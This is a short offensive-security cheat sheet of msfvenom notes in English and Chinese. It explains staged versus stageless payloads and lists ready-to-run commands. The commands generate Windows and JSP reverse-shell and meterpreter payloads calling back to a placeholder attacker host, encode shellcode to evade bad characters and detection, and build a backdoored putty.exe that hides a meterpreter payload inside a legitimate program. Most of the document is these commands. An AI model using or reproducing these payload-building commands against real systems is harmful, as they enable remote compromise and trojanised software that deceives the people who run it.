msfvenom notes

msfvenom bash completion

git clone https://github.com/nopernik/msfvenom-bc-generator.git 
cd msfvenom-bc-generator/
cp msfvenom_bc_generator.rb /usr/share/metasploit-framework/
ruby msfvenom_bc_generator.rb 

staged and unstaged/stageless

unstaged/stageless

msfvenom -p windows/shell_reverse_tcp

staged

msfvenom -p windows/shell/reverse_tcp

NOTE: staged 无法使用 nc 接收 reverse shell

NON STAGED

A single payload containing the exploit and full shell code for the selected task. Inline payloads are by design more stable than their counterparts because they contain everything all in one. However some exploits wont support the resulting size of these payloads.

STAGER

Stager payloads work in conjunction with stage payloads in order to perform a specific task. A stager establishes a communication channel between the attacker and the victim and reads in a stage payload to execute on the remote host.

staged 有效载荷在 shellcode 空间有限的情况下是很理想的，最常见的使用场景是在 Buffer Overflows 中

unstaged/stageless 有效载荷一次性将整个有效载荷发送到目标，无需攻击者额外提供其他数据，可以使用多种监听器(nc、…)

Command Notes

base

msfvenom -p windows/x64/shell_reverse_tcp LHOST=1.2.3.4 LPORT=443 -f exe -o re64.exe

msfvenom -p windows/shell_reverse_tcp LHOST=1.2.3.4 LPORT=443 -f exe -o re86.exe

msfvenom -p windows/meterpreter_reverse_tcp LHOST=1.2.3.4 LPORT=4445 EXITFUNC=thread -f c

msfvenom -p generic/custom PAYLOADFILE=./shellcode -b "\x00" -e x86/shikata_ga_nai -f python -v payload

cat shellcode | msfvenom --arch windows --platform x86 -b "\x00\x09\x0c\x20\x0a\x0d\x0b" -e x86/shikata_ga_nai -f python -v shellcode | sed -e 's/b//g'

Get shellcode assembler code

msfvenom -p linux/x86/exec cmd=whoami | ndisasm -u -

Creating customized backdoored executables

msfvenom -a x86 --platform windows -x putty.exe -k -p windows/meterpreter/reverse_tcp lhost=1.2.3.4 -e x86/shikata_ga_nai -i 33 -b "\x00" -f exe -o puttyX.exe

JSP Shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.IP LPORT=443 -f raw > shell.jsp

Links & Resources

• PAYLOAD TYPES IN THE METASPLOIT FRAMEWORK